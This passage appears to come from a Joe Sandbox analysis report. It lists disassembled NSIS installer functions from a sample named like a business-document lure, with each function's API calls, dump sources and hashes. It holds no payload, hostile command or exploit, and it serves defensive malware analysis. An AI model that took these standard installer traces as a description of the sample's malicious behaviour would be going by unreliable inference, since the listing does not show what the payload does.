                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004FE8,00000000), ref: 00405222
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405229
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040524C
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405253
                                                                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405299
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052CD
                                                                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004052DE
                                                                                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004052F3
                                                                                                                                                                                                                          • GetWindowRect.USER32(?,000000FF), ref: 00405313
                                                                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040532C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405368
                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405378
                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040537E
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405387
                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405391
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A5
                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004053BE
                                                                                                                                                                                                                          • SetClipboardData.USER32(?,00000000), ref: 004053C9
                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004053CF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 590372296-0
                                                                                                                                                                                                                          • Opcode ID: b6d77f6f8327dd2415d03e51c94b15dbd6fec5bbc220b2b00e7ee975be6b98af
                                                                                                                                                                                                                          • Instruction ID: a6ff68720be7f0e5d6bf60450920f0594ccff0b83ae89a6b9846e031650dbd60
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6d77f6f8327dd2415d03e51c94b15dbd6fec5bbc220b2b00e7ee975be6b98af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31A16B71900209BFDB119FA0DD89AAE7B79FB08354F10407AFA01B62A0C7B55E419F69
                                                                                                                                                                                                                          Function 00403A0F Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403A68
                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403A7C
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ACD
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403B82
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                                                                                                                                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                                                                                                                                                                                          • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403BF7
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CD0
                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403CEB
                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403D01
                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403D08
                                                                                                                                                                                                                          • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403D20
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D33
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(0041FD20,?,0041FD20,00422F20), ref: 00403D5C
                                                                                                                                                                                                                          • SetWindowTextA.USER32(?,0041FD20), ref: 00403D6B
                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 184305955-0
                                                                                                                                                                                                                          • Opcode ID: 307f4561790f38b6c012e67fb4482d9c36b6a8ad5ca3b6af93ca9eec2bbe4fe4
                                                                                                                                                                                                                          • Instruction ID: 59f0c632d138382d557344a1f3b7ccf8545d810693bdce96ba14c4126dbc1e18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 307f4561790f38b6c012e67fb4482d9c36b6a8ad5ca3b6af93ca9eec2bbe4fe4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24C1E171A04205BBDB21AF21ED84E2B3E7CFB44706B50453EF611B11E1C779A942AB6E
                                                                                                                                                                                                                          Function 0040402B Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 205windowstringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 004040B6
                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040CA
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 004040E8
                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004040F9
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404108
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404117
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040411A
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404129
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040413E
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041A0
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000), ref: 004041A3
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041CE
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040420E
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040421D
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404226
                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,?), ref: 00404239
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404246
                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404249
                                                                                                                                                                                                                          • SendMessageA.USER32(00000111,?,00000000), ref: 00404275
                                                                                                                                                                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404289
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                                                          • String ID: N$open
                                                                                                                                                                                                                          • API String ID: 3615053054-904208323
                                                                                                                                                                                                                          • Opcode ID: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                                                                                                                                                                                          • Instruction ID: 13510805d6fd3d88b19762a43a0fb8d51a409b78b81c3afae21fa77130ec6155
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42e76c6f9001a471086f2110f9b209c176cf8913a74361ede291af8c06ceb81d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A61B4B1A40205BFEB109F61DC45F6A7B69FB44751F10807AFB04BA2D1C7B8A951CF98
                                                                                                                                                                                                                          Function 0040367D Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A000,0041FD20,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD20,00000000,00000002,766B3410,0042A400,00429000,00000000), ref: 004036F8
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD20,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD20,00000000,00000002,766B3410), ref: 0040376D
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403780
                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(004226C0), ref: 0040378B
                                                                                                                                                                                                                          • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,00429400), ref: 004037D4
                                                                                                                                                                                                                            • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385E
                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                                                                                                                                                                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                                                                                                                                                                                          • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                                                                                                                                                                                          • DialogBoxParamA.USER32(?,00000000,00403A0F,00000000), ref: 004038F5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-2904746566
                                                                                                                                                                                                                          • Opcode ID: 0fbc22c0e6019994adb5b68899df7c5e533ed95ebee4e4790f8062c5049b2641
                                                                                                                                                                                                                          • Instruction ID: 7b7c40b23c28382cce88422b139422c0b39d4688b8d1f116fbeb90bdc2aa80af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fbc22c0e6019994adb5b68899df7c5e533ed95ebee4e4790f8062c5049b2641
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E161C7B46442007ED620BF61AD45F273AACEB4474AF40847FF945B22E1C77CAD069A3E
                                                                                                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                          • Opcode ID: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                                                                                                                                                                                          • Instruction ID: 162af80c0e370fc685607c2eff3bc6c1c184a7d325dd4572e54487cb40a4b06a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40f8494239657d2e8864ccd35a5b2a20f251cf82d96748e84493e10ba4ff4366
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67419B71804249AFCF058FA4CD459AFBBB9FF44310F00812AF551AA1A0C738EA51DFA5
                                                                                                                                                                                                                          Function 00405A46 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00421AB0,NUL,?,00000000,?,00000000,00405BD9,?,?), ref: 00405A55
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,00405BD9,?,?), ref: 00405A79
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,00421AB0,00000400), ref: 00405A82
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                            • Part of subcall function 004058D5: lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(00421EB0,00421EB0,00000400), ref: 00405A9F
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405ABD
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00421EB0,C0000000,00000004,00421EB0,?,?,?,?,?), ref: 00405AF8
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B07
                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3F
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216B0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405B95
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BA6
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BAD
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNEL32(00000003,00402CA6,0042AC00,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                                          • API String ID: 222337774-4148678300
                                                                                                                                                                                                                          • Opcode ID: d422df34665f6ae3a0ba05d8a55084bb7e425f056a88ca5c06b770f9aee5c040
                                                                                                                                                                                                                          • Instruction ID: ba38e0c37d2c4a0677a1b8c3a3e2c5b81f52bfc6e6322859571237bcba2cc6eb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d422df34665f6ae3a0ba05d8a55084bb7e425f056a88ca5c06b770f9aee5c040
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5310271A05A19ABD2202B219C49F6B3AACDF45754F14043AFD01B62D2D6BCBD018EBD
                                                                                                                                                                                                                          Function 00404320 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040436F
                                                                                                                                                                                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404399
                                                                                                                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F0F8,?), ref: 0040444A
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404455
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(004226C0,0041FD20), ref: 00404487
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,004226C0), ref: 00404493
                                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044A5
                                                                                                                                                                                                                            • Part of subcall function 004054D7: GetDlgItemTextA.USER32(?,?,00000400,004044DC), ref: 004054EA
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,*?|<>/":,00000000,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FC0
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,?,?,00000000), ref: 00405FCD
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharNextA.USER32(?,00429000,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FD2
                                                                                                                                                                                                                            • Part of subcall function 00405F68: CharPrevA.USER32(?,?,766B3410,0042A400,00000000,004030B4,0042A400,0042A400,004032CD), ref: 00405FE2
                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041ECF0,?,?,0000040F,?,0041ECF0,0041ECF0,?,?,0041ECF0,?,?,000003FB,?), ref: 00404563
                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040457E
                                                                                                                                                                                                                            • Part of subcall function 004046D7: lstrlenA.KERNEL32(0041FD20,0041FD20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045F2,000000DF,00000000,00000400,?), ref: 00404775
                                                                                                                                                                                                                            • Part of subcall function 004046D7: wsprintfA.USER32 ref: 0040477D
                                                                                                                                                                                                                            • Part of subcall function 004046D7: SetDlgItemTextA.USER32(?,0041FD20), ref: 00404790
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                          • API String ID: 2624150263-3554254475
                                                                                                                                                                                                                          • Opcode ID: 8ed6610929a7d0aded7c808b19cddee7a30b6bcc2978460cfb25f4a637688ad0
                                                                                                                                                                                                                          • Instruction ID: 52af94dd87b45bde8ff603abcb7252099f64fe51c68325ad3ba2cad582a3dd3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ed6610929a7d0aded7c808b19cddee7a30b6bcc2978460cfb25f4a637688ad0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8A18DB1900209ABDB11AFA5DC45BEFB6B8EF84314F14843BF611B62D1D77C8A418B69
                                                                                                                                                                                                                          Function 00402C66 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402C93
                                                                                                                                                                                                                            • Part of subcall function 00405970: GetFileAttributesA.KERNEL32(00000003,00402CA6,0042AC00,80000000,00000003), ref: 00405974
                                                                                                                                                                                                                            • Part of subcall function 00405970: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405996
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CDF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • soft, xrefs: 00402D54
                                                                                                                                                                                                                          • hA, xrefs: 00402CF4
                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                                                                                                                                                          • Null, xrefs: 00402D5D
                                                                                                                                                                                                                          • Inst, xrefs: 00402D4B
                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402CB6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$hA
                                                                                                                                                                                                                          • API String ID: 4283519449-1344412290
                                                                                                                                                                                                                          • Opcode ID: 0ee348c889562484c3b768d13c3a93ebd41d4e0e75de75225554a952d4b9bcf2
